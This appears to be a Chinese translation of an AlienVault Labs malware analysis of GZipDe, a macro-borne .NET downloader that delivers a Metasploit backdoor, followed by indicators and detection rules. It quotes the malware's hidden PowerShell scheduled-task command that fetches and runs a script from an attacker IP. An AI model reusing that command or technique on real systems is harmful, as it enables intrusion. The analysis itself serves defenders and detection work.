5月底，一家中东新闻网站发表了一篇关于下一届上海合作组织峰会的文章。一周前，AlienVault实验室发现了一份新的针对该地区的恶意文件。它使用从报告中提取的一段文本作为诱饵：

这是涉及多个服务器和工件的多阶段感染的第一步。虽然最终目标似乎是安装Metasploit后门程序，但是我们发现了一个有趣的.NET下载程序，它使用自定义加密方法来混淆进程内存并逃避防病毒检测。

恶意文件

该文件是由阿富汗用户上传到VirusTotal的，包含嵌入宏恶意软件的微软MS Office Word文档（.doc）。当打开时，它执行一个存储为十六进制流的Visual Basic脚本，并在一个隐藏的Powershell控制台中执行一个新任务：

‘C:WindowsSystem32schtasks.exe’ /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR ‘Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\’http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\’,\’$env:publicsvchost325.vbs\’);(New-Object -com Shell.Application).ShellExecute(\’$env:publicsvchost325.vbs\’);’ /F

利用HTTP请求，它解析为以下URL：

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

由于服务器现在处于离线状态，因此我们缺少了感染链的下一步。

基于共同的路径，我们认为这个文件是相关的，并且可能是后面感染步骤的一部分：http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe。

GZipDe – 加密的下载程序

该恶意软件的内部名称是Gzipde，正如它在攻击者设备上构建的路径所指定的那样：

Documents Visual Studio 2008 Projects gzipde gzipde obj Debug gzipde.pdb

我们在GitHub上发现了原始的反向TCP有效载荷，尽管攻击者在该版本上增加了一层额外的加密有效载荷。它由名为GZipDe的Base64字符串组成，GZipDe是一个压缩后使用对称密钥算法进行自定义加密的字符串，可能会避免防病毒检测。

该密钥被描述为一个字节数组，其值为：

解压后，它通过一个解密程序。使用的加密方法是RC4，密钥长度为23个字节。

恶意软件分配一个新的内存页，具有执行、读和写权限。然后它复制解密的有效载荷的内容，并启动一个新的线程来执行它。

该脚本使用WaitForSingleObject C＃类，这意味着程序访问互斥对象。一个特殊的处理程序控制进程对系统资源的访问。这可以防止同一恶意软件的多个实例同时运行，不必要地增加资源使用率并产生更多的网络噪音。

有效载荷包含shellcode，该代码在175.194.42[.]8上与服务器联系 。当服务器没有启动时，Shodan 记录了它服务于Metasploit的有效载荷：

Metasploit正成为有针对性攻击的热门选择。

Metasploit有效载荷

服务器，175.194.42[.]8，交付了一个Metasploit的有效载荷。它包含绕过系统检测的shellcode（因为它看起来有一个有效的DOS标头）和一个Meterpreter有效载荷）——一个有能力的后门。例如，它可以从系统中收集信息，并联系命令和控制服务器以接收进一步的命令。

这个shellcode将整个DLL加载到内存中，所以它可以在没有信息写入磁盘的情况下运行。这个操作被称为反射DLL注入（Reflective DLL injection）。从这一点来看，攻击者可以传输任何其他有效载荷，以获得提升的权限并在本地网络内移动。

附录

文件哈希值

https://otx.alienvault.com/indicator/file/faf003c38758cf70b12bc4899714833e4713096c8f66163e753b3f0e70f2ba28
https://otx.alienvault.com/indicator/file/148d280586de3a62d366c396c8bfedd6683a2e3eb1c3d956da57dbfc19d1983c
https://otx.alienvault.com/indicator/file/3932999be863d5844168e3bbb09ffc2f8d572a8f4a93946adb7e9c438f35c711

IP地址

118.193.251[.]137

175.194.42[.]8

URLs

http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe

http://118.193.251[.]137/dropbox/?p=BT67HU78HZ

网络检测

多用途

AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
ET ATTACK_RESPONSE Metasploit/Meterpreter – Sending metsrv.dll to Compromised Host
ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate

专用

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”AV TROJAN GZipDe MacroMalware CnC Checkin”; flow:established,to_server; content:”/dropbox/?p=”; http_uri; depth:12; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; pcre:”^//dropbox/?p=[a-zA-Z0-9]*$/U”; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:”AV TROJAN GZipDe MacroMalware Payload Request”; flow:established,to_server; content:”/dropbox/file”; depth:13; http_uri; content:”.exe”; http_uri; distance:0; isdataat:!1,relative; content:!”User-Agent|3a| “; http_header; content:!”Referer”; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)

统一安全管理（USM）关联规则

系统妥协 – 代码执行 – 由Office Word创建的Powershell进程

交付和攻击 – 可疑下载 – 通过Office宏下载文件

环境意识 – 代码执行 – 可疑的PowerShell参数

原文：https://www.alienvault.com/blogs/labs-research/gzipde-an-encrypted-downloader-serving-metasploit?utm_medium=Social&utm_source=THN&utm_content=SP&utm_campaign=GZipDE_blog